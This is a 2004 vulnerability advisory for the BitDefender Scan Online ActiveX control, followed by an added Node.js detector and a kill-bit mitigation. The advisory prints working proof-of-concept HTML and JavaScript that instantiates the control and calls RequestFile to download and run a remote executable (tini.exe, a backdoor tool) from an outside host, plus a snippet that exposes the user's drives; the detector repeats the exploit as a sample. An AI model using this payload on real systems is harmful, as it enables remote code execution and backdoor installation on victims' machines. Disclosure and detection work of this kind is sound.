~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: BitDefender Scan Online (ActiveX)
Vendors: http://www.bitdefender.com/scan/Msie/index.php
Platforms: Windows
Bug: Remote File Download & Execute & Private Information Disclosure
Risk: High - Running Arbitrary Code
Exploitation: Remote with browser
Date: 19 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

This is a quote of the BitDefender Scan Online description:

"BitDefender Scan Online is a fully functional antivirus product, with a web-based interface and featuring all required elements for remotely antivirus scanning and cleaning: it scans system's memory, all files, folders and drives' boot sector, providing the user with the option to automatically clean the infected files."

This is a quote of the page title:

"BitDefender AntiVirus - Data Security, AntiVirus Software, Free Protection".

The meaning of that sentence is very far from reality. I believe it is ridiculous that an antivirus product will deliver and execute a virus on my system.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=======
2) Bugs
=======

"BitDefender Scan Online" downloads its components and registers the following COM/ActiveX object:

  "AVXSCANONLINE.AvxScanOnlineCtrl.1"

with the following CLSID:

  80DD2229-B8E4-4C77-B72F-F22972D723EA

"BitDefender Scan Online" has confusing protection. None of its properties and functions can be set or accessed on an instance created from script with:

  object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1")

They can only be set or accessed on an instance created with an HTML object tag, such as:

  <OBJECT id=mymy codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>

Since any web page can carry such a tag, this restriction offers no protection against a hostile site: once the control is on the page, the same methods are fully scriptable.

----------------------------------------------------------------------------

"BitDefender Scan Online" discloses the user's information, allowing a remote web page to see all drives and folders of the system using this simple code:

------------------- CUT HERE -------------------
<OBJECT id=seemycomputer codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215">
</OBJECT>
------------------- CUT HERE -------------------

----------------------------------------------------------------------------

"BitDefender Scan Online" contains a function that will ***DOWNLOAD A REMOTE FILE AND EXECUTE IT ON THE SYSTEM***. For example:

  object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

This is proof-of-concept code:
------------------- CUT HERE -------------------
<OBJECT id=mymy codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted">
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215">
</OBJECT>
<script>
var a;
function cool() {
  // Drive the control through the OBJECT-tag instance ("mymy"),
  // which is scriptable where new ActiveXObject(...) is not.
  mymy.Update();
  mymy.Updating(1);
  mymy.SetCountry("Israel");
  mymy.EnableRtvr(1);
  mymy.SetupMode = true;
  // Download a remote file and execute it on the victim's system.
  mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}
// Give the control time to load and initialise before calling into it.
setTimeout("cool()", 1500);
</script>
------------------- CUT HERE -------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Only the one who sees the invisible, Can do the Impossible."
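The following is an added example and is not part of Rafel Ivgi's advisory or of BitDefender's code. It is a static detector, of the kind a web proxy, mail gateway or incident responder replaying captured pages would run, that flags HTML instantiating the control by the CLSID given above (80DD2229-B8E4-4C77-B72F-F22972D723EA) and scripting its RequestFile() method. The sample pages embedded in it are constructed for the demonstration (the first is the advisory's own proof of concept, trimmed); the finding types, severity labels and the `verdict` policy are this example's own choices, not anything BitDefender or the author published.

```javascript
// Added example (not from the original advisory): static detection of HTML
// that instantiates the BitDefender Scan Online control by CLSID and scripts
// its RequestFile() method. Runs under Node.js with no DOM, so it works on the
// raw markup with regular expressions.

// CLSID registered by the control, as given in the advisory.
const VULN_CLSID = '80DD2229-B8E4-4C77-B72F-F22972D723EA';

// <OBJECT ...> start tag; group 1 is the attribute list (may span lines).
const OBJECT_TAG_RE = /<object\b([^>]*)>/gi;
// classid=CLSID:{...}, tolerating quotes, braces and any letter case.
const CLASSID_RE = /\bclassid\s*=\s*["']?\s*(?:clsid:)?\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?/i;
// id=... attribute; the \b stops this from matching the "id" inside "classid".
const ID_ATTR_RE = /\bid\s*=\s*["']?([\w-]+)/i;
// <receiver>.RequestFile("<url>", "<path>") in inline script.
const REQUESTFILE_RE = /\b([\w$]+)\s*\.\s*RequestFile\s*\(\s*(["'])(.*?)\2\s*,\s*(["'])(.*?)\4\s*\)/g;

function scanHtml(html) {
  const findings = [];
  const vulnIds = new Set();

  // Pass 1: every OBJECT tag whose classid is the vulnerable control.
  for (const tag of html.matchAll(OBJECT_TAG_RE)) {
    const attrs = tag[1];
    const cls = CLASSID_RE.exec(attrs);
    if (!cls || cls[1].toUpperCase() !== VULN_CLSID) continue;
    const idm = ID_ATTR_RE.exec(attrs);
    const id = idm ? idm[1] : null;
    if (id) vulnIds.add(id);
    // Instantiation alone is reportable: per the advisory the control exposes
    // the local drive and folder layout without any further scripting.
    findings.push({ type: 'vulnerable-control-instantiated', id, clsid: VULN_CLSID });
  }

  // Pass 2: RequestFile() calls. A receiver that is one of the instantiated
  // ids is the download-and-execute pattern from the advisory; an unknown
  // receiver is still suspicious, since the object may be reached another way.
  for (const call of html.matchAll(REQUESTFILE_RE)) {
    const [, receiver, , url, , path] = call;
    findings.push({
      type: 'requestfile-call',
      receiver,
      url,
      path,
      severity: vulnIds.has(receiver) ? 'high' : 'medium',
    });
  }
  return findings;
}

// Gateway policy for this example: block when the control is instantiated and
// RequestFile is scripted against it, alert on anything else that matched.
function verdict(html) {
  const f = scanHtml(html);
  if (f.some(x => x.type === 'requestfile-call' && x.severity === 'high')) return 'block';
  if (f.length) return 'alert';
  return 'allow';
}

// Constructed sample: the advisory's proof-of-concept markup, trimmed.
const SAMPLE_POC = String.raw`<OBJECT id=mymy codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1
 classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME="Id" VALUE="Trusted"></OBJECT>
<script>
function cool() {
  mymy.Update();
  mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\");
}
setTimeout("cool()", 1500);
</script>`;

// Constructed benign page: an OBJECT tag with an unrelated (all-zero) CLSID.
const SAMPLE_BENIGN = '<html><body><object id="x" classid="clsid:00000000-0000-0000-0000-000000000000"></object></body></html>';

console.log(verdict(SAMPLE_POC), scanHtml(SAMPLE_POC));
console.log(verdict(SAMPLE_BENIGN), scanHtml(SAMPLE_BENIGN));
```

Two caveats for anyone deploying something like this. First, it is a regex over source text, so trivial script obfuscation (building the method name from pieces, or reaching the object through `document.all` rather than its id) evades pass 2; pass 1, keyed on the CLSID the browser must see to instantiate the control, is the more robust signal. Second, network detection is a stopgap: the host-side fix for a scriptable control like this one, short of the vendor shipping a fixed control, is the Internet Explorer kill bit, a `Compatibility Flags` DWORD of 0x400 under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}`, which stops IE instantiating the CLSID from an OBJECT tag regardless of the `codeBase` offered.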